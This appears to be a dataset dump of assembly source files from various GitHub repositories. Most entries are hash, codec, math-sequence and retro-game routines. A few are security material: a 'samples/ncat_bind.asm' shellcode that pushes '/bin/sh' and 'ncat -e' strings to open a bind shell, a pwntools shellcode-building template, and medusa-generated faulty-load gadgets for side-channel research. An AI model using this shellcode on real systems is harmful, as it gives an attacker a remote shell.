] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_1050_2000.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r13
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x2f18, %r10
sub $61701, %rbp
movups (%r10), %xmm2
vpextrq $1, %xmm2, %r13
nop
and %r12, %r12
lea addresses_D_ht+0x1e8a8, %rsi
lea addresses_D_ht+0x1c8a8, %rdi
nop
nop
nop... | 34.311404 | 2,999 | 0.656909 |
b24ced0c5bd200de518fb3679ac85dd0518b779a | 14,336 | asm | Assembly | hashes/rmd256.asm | FloydZ/Crypto-Hash | 2635450fb16d4d8dc4578d6539cc25ce599f7e21 | [
"MIT"
] | 11 | 2015-03-17T10:31:23.000Z | 2022-01-21T17:42:43.000Z | hashes/rmd256.asm | 0xFF1E071F/Crypto-Hash | 2635450fb16d4d8dc4578d6539cc25ce599f7e21 | [
"MIT"
] | null | null | null | hashes/rmd256.asm | 0xFF1E071F/Crypto-Hash | 2635450fb16d4d8dc4578d6539cc25ce599f7e21 | [
"MIT"
] | 6 | 2018-01-29T16:06:36.000Z | 2021-05-08T19:22:24.000Z |
.const
pushad_size equ 8*4
pushad_eax equ 7*4
pushad_ecx equ 6*4
pushad_edx equ 5*4
pushad_ebx equ 4*4
pushad_esp equ 3*4
pushad_ebp equ 2*4
pushad_esi equ 1*4
pushad_edi equ 0*4
.data?
RMD256HashBuf db 64 dup(?)
RMD256Len dd ?
RMD256Index dd ?
RMD256Digest dd 8 dup(?)
.code
RMD256FF macro dwA, dwB, dwC, dwD, locX,... | 38.956522 | 70 | 0.632603 |
14ac07b56066f410208829d7f50b6b417ddb8cc1 | 876 | asm | Assembly | home/predef.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | 1 | 2022-02-15T00:19:44.000Z | 2022-02-15T00:19:44.000Z | home/predef.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | home/predef.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | Predef::
; Call predefined function a.
; To preserve other registers, have the
; destination call GetPredefRegisters.
; Save the predef id for GetPredefPointer.
ld [wPredefID], a
; A hack for LoadDestinationWarpPosition.
; See LoadTilesetHeader (predef $19).
ldh a, [hLoadedROMBank]
ld [wPredefParentBank], a
p... | 17.176471 | 43 | 0.697489 |
fceb5d2d70897e7e00ed305486bd2870ce96a6c8 | 472 | asm | Assembly | oeis/245/A245431.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/245/A245431.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/245/A245431.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A245431: Number of nonnegative integers with property that their base 10/7 expansion has n digits.
; Submitted by Jamie Morken(s4)
; 10,10,10,20,30,40,60,80,120,170,240,340,490,700,1000,1430,2040,2910,4160,5940,8490,12130,17330,24750,35360,50520,72170,103100,147280,210400,300570,429390,613410,876300,1251860,1788370,2... | 27.764706 | 217 | 0.720339 |
71ef37083804cc46ecdac0d44c8a7818aa13ae07 | 1,629 | asm | Assembly | programs/oeis/117/A117868.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/117/A117868.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/117/A117868.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A117868: Number of palindromes (in base 9) below 9^n.
; 8,16,88,160,808,1456,7288,13120,65608,118096,590488,1062880,5314408,9565936,47829688,86093440,430467208,774840976,3874204888,6973568800,34867844008,62762119216,313810596088,564859072960,2824295364808,5083731656656,25418658283288,45753584909920,228767924549608,41... | 108.6 | 1,463 | 0.908533 |
35fc2845ba8af063def96ee31a035a8176f64433 | 277 | asm | Assembly | mastersystem/zxb-sms-2012-02-23/zxb-sms/wip/zxb/library-asm/bor16.asm | gb-archive/really-old-stuff | ffb39a518cad47e23353b3420b88e2f3521fd3d7 | [
"Apache-2.0"
] | 10 | 2016-10-27T20:46:02.000Z | 2021-11-01T15:49:13.000Z | mastersystem/zxb-sms-2012-02-23/zxb-sms/wip/zxb/library-asm/bor16.asm | gb-archive/really-old-stuff | ffb39a518cad47e23353b3420b88e2f3521fd3d7 | [
"Apache-2.0"
] | null | null | null | mastersystem/zxb-sms-2012-02-23/zxb-sms/wip/zxb/library-asm/bor16.asm | gb-archive/really-old-stuff | ffb39a518cad47e23353b3420b88e2f3521fd3d7 | [
"Apache-2.0"
] | 2 | 2015-03-11T14:28:08.000Z | 2017-11-02T10:57:57.000Z | ; vim:ts=4:et:
; FASTCALL bitwise or 16 version.
; result in HL
; __FASTCALL__ version (operands: A, H)
; Performs 16bit or 16bit and returns the boolean
; Input: HL, DE
; Output: HL <- HL OR DE
__BOR16:
ld a, h
or d
ld h, a
ld a, l
or e
ld l, a
ret
| 13.85 | 49 | 0.606498 |
21c9cb489a0dcf0f696a7fbaf95fa6b6c289b1bb | 183 | asm | Assembly | libsrc/_DEVELOPMENT/adt/w_array/c/sccz80/w_array_destroy.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/_DEVELOPMENT/adt/w_array/c/sccz80/w_array_destroy.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null | libsrc/_DEVELOPMENT/adt/w_array/c/sccz80/w_array_destroy.asm | meesokim/z88dk | 5763c7778f19a71d936b3200374059d267066bb2 | [
"ClArtistic"
] | null | null | null |
; void w_array_destroy(w_array_t *a)
SECTION code_adt_w_array
PUBLIC w_array_destroy
defc w_array_destroy = asm_w_array_destroy
INCLUDE "adt/w_array/z80/asm_w_array_destroy.asm"
| 16.636364 | 49 | 0.836066 |
05a5eb937ff6d054aefd8c29cac06c422225a312 | 248 | asm | Assembly | PRG/objects/3-8.asm | narfman0/smb3_pp1 | 38a58adafff67a403591e38875e9fae943a5fe76 | [
"Unlicense"
] | null | null | null | PRG/objects/3-8.asm | narfman0/smb3_pp1 | 38a58adafff67a403591e38875e9fae943a5fe76 | [
"Unlicense"
] | null | null | null | PRG/objects/3-8.asm | narfman0/smb3_pp1 | 38a58adafff67a403591e38875e9fae943a5fe76 | [
"Unlicense"
] | null | null | null | .byte $01 ; Unknown purpose
.byte OBJ_AUTOSCROLL, $00, $51
.byte OBJ_BONUSCONTROLLER, $01, $2C
.byte OBJ_BIGBERTHA, $06, $19
.byte OBJ_GREENTROOPA, $12, $15
.byte OBJ_GREENTROOPA, $38, $16
.byte OBJ_WOODENPLATFORMFLOAT, $54, $18
.byte $FF
| 24.8 | 40 | 0.697581 |
97dc5fa71fb6391bc0d5da7ae75e9efcdad60389 | 225 | asm | Assembly | libsrc/gfx/portable/undrawb.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/gfx/portable/undrawb.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/gfx/portable/undrawb.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_graphics
PUBLIC undrawb
PUBLIC _undrawb
EXTERN commonbox
EXTERN unplot
;void undrawb(int x, int y, int w, int h) __smallc
;Note ints are actually uint8_t
undrawb:
_undrawb:
ld hl,unplot
jp commonbox
| 13.235294 | 51 | 0.76 |
ccf1469e0e9dae5292fbf6e0621566aedd988f40 | 1,656 | asm | Assembly | textformats/Base64Decode.asm | FloydZ/Crypto-Hash | 2635450fb16d4d8dc4578d6539cc25ce599f7e21 | [
"MIT"
] | 11 | 2015-03-17T10:31:23.000Z | 2022-01-21T17:42:43.000Z | textformats/Base64Decode.asm | 0xFF1E071F/Crypto-Hash | 2635450fb16d4d8dc4578d6539cc25ce599f7e21 | [
"MIT"
] | null | null | null | textformats/Base64Decode.asm | 0xFF1E071F/Crypto-Hash | 2635450fb16d4d8dc4578d6539cc25ce599f7e21 | [
"MIT"
] | 6 | 2018-01-29T16:06:36.000Z | 2021-05-08T19:22:24.000Z |
.data
align 4
b64table label byte
db 0,42 dup (-1)
db 62; + ; [02Bh]
db 3 dup(-1)
db 63; / ; [02Fh]
db 52,53,54,55,56,57,58,59,60,61; 0..9 ;30-39
db 3 dup(-1)
db 0 ; = ; [03Dh]
db 3 dup(-1)
db 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25; A..Z
db 6 dup(-1)
db 26,27,28,29,30,31,32,33,34,35,36,37... | 17.431579 | 86 | 0.63285 |
c4c4842bb08994df7c310e121dd8436dce4e340f | 8,114 | asm | Assembly | pwnlib/shellcraft/templates/amd64/mov.asm | magnologan/pwntools | 32b05024d33019e16801cc50ec0108ee783eff27 | [
"MIT"
] | null | null | null | pwnlib/shellcraft/templates/amd64/mov.asm | magnologan/pwntools | 32b05024d33019e16801cc50ec0108ee783eff27 | [
"MIT"
] | null | null | null | pwnlib/shellcraft/templates/amd64/mov.asm | magnologan/pwntools | 32b05024d33019e16801cc50ec0108ee783eff27 | [
"MIT"
] | null | null | null | <%
from pwnlib.util import lists, packing, fiddling, misc
from pwnlib import constants
from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context
from pwnlib.log import getLogger
log = getLogger('pwnlib.shellcraft.amd64.mov')
%>
<%page args="dest, src, stack_allowed = True"/... | 35.902655 | 101 | 0.545847 |
9d2bc0d6cca421b5fdf66ca2a3f06c3a9ac4fd1a | 574 | asm | Assembly | Homework Submission/Homework 1/homework 1 Q2.asm | FariaIslamHridy/CSE331L-Section-10-Fall20-NSU | 5b0ed4addf8d39995adc1ce8fab10f21afe63155 | [
"MIT"
] | null | null | null | Homework Submission/Homework 1/homework 1 Q2.asm | FariaIslamHridy/CSE331L-Section-10-Fall20-NSU | 5b0ed4addf8d39995adc1ce8fab10f21afe63155 | [
"MIT"
] | null | null | null | Homework Submission/Homework 1/homework 1 Q2.asm | FariaIslamHridy/CSE331L-Section-10-Fall20-NSU | 5b0ed4addf8d39995adc1ce8fab10f21afe63155 | [
"MIT"
] | null | null | null | org 100h
MOV AX, 2 ;Allocate first even int value
MOV CX, AX ;Add and store sum in CX register
MOV AX, 4 ;Allocate second even int value
ADD CX, AX ;Add and store sum in CX register
MOV AX, 6 ;Allocate third even i... | 26.090909 | 47 | 0.571429 |
7650c738b165b471add7b37544b0641f7227d956 | 358 | asm | Assembly | programs/oeis/202/A202199.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/202/A202199.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | programs/oeis/202/A202199.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | ; A202199: Number of (n+2) X 7 binary arrays avoiding patterns 001 and 101 in rows and columns.
; 1176,4704,14700,38808,90552,192192,378378,700700,1233232,2079168,3378648,5317872,8139600,12155136,17757894,25438644,35802536,49588000,67687620,91171080,121310280,159606720,207821250,268006284,342540576
add $0,8
mov $1,$0
... | 35.8 | 203 | 0.782123 |
912579b752ebaa82beb4d90e851b1e45da4add46 | 4,770 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48.log_21829_1683.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48.log_21829_1683.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48.log_21829_1683.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x11b98, %rsi
lea addresses_D_ht+0x8744, %rdi
nop
and $62284, %r12
mov $46, %rcx
rep movsl
nop
sub %rax, %rax
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push... | 49.175258 | 2,999 | 0.657652 |
3db0fd27693bb504fa510fac446b42af3db7beb7 | 3,945 | asm | Assembly | src/palettes.asm | ISSOtm/gb-open-world | b0b5b838e2a98e536e440632c95472ea057111c5 | [
"MIT"
] | 8 | 2021-03-14T21:48:19.000Z | 2021-11-16T11:05:16.000Z | src/palettes.asm | ISSOtm/gb-open-world | b0b5b838e2a98e536e440632c95472ea057111c5 | [
"MIT"
] | null | null | null | src/palettes.asm | ISSOtm/gb-open-world | b0b5b838e2a98e536e440632c95472ea057111c5 | [
"MIT"
] | null | null | null |
INCLUDE "defines.asm"
SECTION "Palette buffer fading", ROM0
; Applies fade to both palette buffers
;
FadePaletteBuffers::
ld hl, wFadeSteps
dec [hl]
inc hl
assert wFadeSteps + 1 == wFadeDelta
ld a, [hli]
ld e, a
assert wFadeDelta + 1 == wFadeAmount
add a, [hl]
jr z, .clamp ; 0 is an illegal value
ld d, a
... | 17.077922 | 88 | 0.662357 |
912c655abd05009d20c22fd604d2bf65196b4363 | 32,500 | asm | Assembly | xy-VSFilter/src/thirdparty/VirtualDub/Kasumi/source/a_resample_mmx.asm | wurui1994/AviSynth | d318f4b455c49a8864c30b3cce84925ebb16c002 | [
"MIT"
] | 1 | 2018-09-27T09:37:42.000Z | 2018-09-27T09:37:42.000Z | xy-VSFilter/src/thirdparty/VirtualDub/Kasumi/source/a_resample_mmx.asm | wurui1994/AviSynth | d318f4b455c49a8864c30b3cce84925ebb16c002 | [
"MIT"
] | null | null | null | xy-VSFilter/src/thirdparty/VirtualDub/Kasumi/source/a_resample_mmx.asm | wurui1994/AviSynth | d318f4b455c49a8864c30b3cce84925ebb16c002 | [
"MIT"
] | null | null | null | ; VirtualDub - Video processing and capture application
; Graphics support library
; Copyright (C) 1998-2004 Avery Lee
;
; This program is free software; you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation; either version 2 of... | 20.833333 | 116 | 0.593631 |
ed6ec6f756a1a903e8c7155fdbf44f9269f51dd3 | 263 | asm | Assembly | 8_kyu/Century_From_Year.asm | UlrichBerntien/Codewars-Katas | bbd025e67aa352d313564d3862db19fffa39f552 | [
"MIT"
] | null | null | null | 8_kyu/Century_From_Year.asm | UlrichBerntien/Codewars-Katas | bbd025e67aa352d313564d3862db19fffa39f552 | [
"MIT"
] | null | null | null | 8_kyu/Century_From_Year.asm | UlrichBerntien/Codewars-Katas | bbd025e67aa352d313564d3862db19fffa39f552 | [
"MIT"
] | null | null | null | section .text
global centuryFromYear
centuryFromYear: ; int centuryFromYear(int year)
; input: edi = year
; output: rax
mov ecx,99
mov eax,ecx
add eax,edi
inc ecx ; ecx := 100
xor edx,edx
div ecx
ret | 21.916667 | 50 | 0.56654 |
2e3b1e4ab7daa6db2bd9cf902ee2c72e0f40ddc1 | 2,334 | asm | Assembly | src/x86/splat_mv.asm | cgisquet/dav1d | aebc10147d4bbb9d97826c6d0865ff9a64b0f370 | [
"BSD-2-Clause"
] | null | null | null | src/x86/splat_mv.asm | cgisquet/dav1d | aebc10147d4bbb9d97826c6d0865ff9a64b0f370 | [
"BSD-2-Clause"
] | null | null | null | src/x86/splat_mv.asm | cgisquet/dav1d | aebc10147d4bbb9d97826c6d0865ff9a64b0f370 | [
"BSD-2-Clause"
] | null | null | null | %include "config.asm"
%include "ext/x86/x86inc.asm"
SECTION_RODATA 32
%macro JMP_TABLE 1-*
%xdefine %1_table (%%table - 2*%2)
%xdefine %%base %1_table
%xdefine %%prefix mangle(private_prefix %+ _%1)
%%table:
%rep %0 - 1
dd %%prefix %+ .loop%2 - %%base
%rotate 1
%endrep
%endmacr... | 22.660194 | 59 | 0.455441 |
56bb6d80980ae8e159040540d59ff9a8e64b3f07 | 874 | asm | Assembly | samples/ncat_bind.asm | 0x00-0x00/shellcoding | a975d4d0f2e4d6de80feb99e760db2c4a7d8a43d | [
"MIT"
] | null | null | null | samples/ncat_bind.asm | 0x00-0x00/shellcoding | a975d4d0f2e4d6de80feb99e760db2c4a7d8a43d | [
"MIT"
] | null | null | null | samples/ncat_bind.asm | 0x00-0x00/shellcoding | a975d4d0f2e4d6de80feb99e760db2c4a7d8a43d | [
"MIT"
] | 1 | 2019-10-27T12:58:16.000Z | 2019-10-27T12:58:16.000Z | global _start:
_start:
xor rdi, rdi;zera o rdi
xor rsi, rsi ;zera o rsi
xor rax, rax ;zera o rax
push rdi ; stack = 0 0
pop rdx ; rdx = 0 | stack = NULL
mov rax, 0x68732f4141414141 ; move hs/ no rax
shr rax, 0x28 ;insere null byte no primeiro A
push rax
mov rax, 0x6e69622f20652d20 ;move nib/ -e rax
push ... | 24.971429 | 79 | 0.718535 |
1bec6d2d76a47ce64898a0d7f4030741c2fb1393 | 451 | asm | Assembly | oeis/101/A101342.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/101/A101342.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/101/A101342.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A101342: Fibonacci-Mersenne numbers.
; Submitted by Jon Maiga
; 0,1,2,13,610,1346269,6557470319842,155576970220531065681649693,87571595343018854458033386304178158174356588264390370,27745922289305716855338470916082815029348872029647830861914852073402148308000613611082094085891168867554589
seq $0,79 ; Powers of 2: a(n... | 56.375 | 226 | 0.798226 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.